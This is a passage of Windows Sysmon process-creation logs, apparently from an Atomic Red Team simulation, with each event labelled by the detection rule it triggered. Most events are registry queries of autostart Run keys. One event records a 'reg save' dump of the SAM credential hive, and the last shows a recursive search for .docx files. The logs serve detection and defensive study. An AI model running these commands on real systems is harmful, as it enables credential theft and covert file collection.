(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
